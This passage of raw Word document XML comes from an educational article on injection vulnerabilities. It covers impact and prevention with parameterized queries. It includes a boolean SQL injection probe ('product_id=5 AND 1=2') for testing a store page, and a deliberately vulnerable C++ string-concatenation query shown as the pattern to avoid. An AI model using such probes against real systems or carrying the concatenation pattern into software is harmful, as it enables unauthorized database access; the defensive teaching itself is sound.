          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>product_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>=5 AND 1=2</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see if the item disappears from the store view, proving the database engine is evaluating the tester's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D581949" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Impact Assessment (Damages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CED697"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 xml:space="preserve">An injection vulnerability is rarely confined to a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>single entry</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> point; its effects rapidly cascade through both infrastructure and corporate assets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550B4D39" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>1. Technical Impact (System &amp; Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9E72FA"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 xml:space="preserve">The technical impact of an injection attack varies depending on the targeted interpreter, but it typically threatens the entire </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>CIA Triad</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Confidentiality, Integrity, and Availability).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ADB08C"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Total Loss of Confidentiality (Data Exfiltration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5AA886"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Attackers can bypass application authorization filters to read any data accessible by the database or interpreter session. In SQL environments, this allows them to dump the entire database contents, exposing hashes, personally identifiable information (PII), or trade secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D000953"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Arbitrary Modification &amp; Deletion (Data Corruption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15729D88"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 xml:space="preserve">Injection does not just read data; it grants manipulation privileges. Attackers can execute </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> statements to alter logs, corrupt transactional histories, wipe databases entirely, or inject malicious payloads into stored procedures to compromise subsequent users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69121EDB"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Unauthorized Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77369717"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By manipulating parameters within login or query structures, attackers can bypass authentication checks or force the application to treat their session with elevated privileges, effectively turning a guest or unauthenticated user into a full system administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044F3DE7"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Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0673CC"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 xml:space="preserve">This represents the absolute worst-case scenario. When </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>OS Command Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs, an attacker passes terminal commands directly to the host server's operating system shell. This can allow them to install backdoors, run malware, spin up unauthorized processes (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>cryptominers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>), or pivot deeper into the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659551BE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>2. Business Impact (Corporate Consequences)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6DD0F3"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When technical systems collapse or release unauthorized data, the consequences cross directly into corporate liabilities, financial risk, and brand erosion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF5B579"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lastRenderedPageBreak/>
        <w:t>According to IBM's annual cost data, data breaches stemming from structural application flaws like severe injection frequently cost organizations millions of dollars in detection, escalation, and post-breach response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3FA976"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Regulatory Non-Compliance &amp; Legal Penalties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61551125"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If user data is exposed, companies face severe fines under international privacy laws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177FAD42" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GDPR (Europe):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fines up to 4% of a company's global annual turnover for failing to secure customer data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18267746" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>HIPAA (Healthcare):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Millions in statutory penalties if Protected Health Information (PHI) is compromised via vulnerable public portals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA780C"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Severe Financial Remediation Costs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C2002"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The immediate overhead includes hiring digital forensics firms, setting up credit monitoring for affected users, executing emergency code refactoring, paying legal defense teams, and managing public relations fallout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22849052"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Intellectual Property Theft &amp; Loss of Competitive Edge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A157FB"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If the application manages internal proprietary data, design specs, or source code, a single database dump can leak trade secrets straight to competitors or onto the dark web, permanently destroying a company's unique market advantage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B908E2"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Erosion of Customer Trust &amp; Brand Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9691A1"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Security failures signal systemic negligence to clients and stakeholders. A public data breach often drives customer churn, drops stock prices, and results in long-term damage to corporate reputation that can take years to rebuild.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5DAAED" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Prevention (Building it Right)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A730CFB"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Preventing injection vulnerabilities structurally requires moving away from reactive sanitization and adopting defensive engineering practices. The goal is to separate code from data by design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC5CC95" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Secure Coding Practices (The First Line of Defense)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614629F9"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The most effective secure coding choice a developer can make is to completely isolate the execution engine from the input variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC517FD"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Always Use Parameterization (Prepared Statements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33361948"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 xml:space="preserve">When interacting with databases, developers must utilize parameterized queries or prepared statements. Parameterization compiles the SQL query structure </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>inserting user input, forcing the database engine to treat inputs strictly as parameters, never as executable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D74A6DD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Vulnerable Pattern (Concatenation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F323F9B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>// C++ example of structural risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BEF68D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>std::string query = "SELECT * FROM users WHERE target = '" + input +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A053F84" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>"'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06625897" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Secure Pattern (Parameterization):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ED3DB9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>// Utilizing a safe placeholder interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7965A3C4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> = con-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>prepareStatement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>("SELECT * FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4893EF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>WHERE target = ?");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6009DF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>setString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>(1, input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116785E2"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Safe Native Sinks and Execution Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B87E8B9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>For OS Commands:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Avoid executing raw commands via system shells ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>system()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>shell=True</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Python). Instead, pass arguments as discrete elements of an array using native, non-shell APIs like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , Java's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
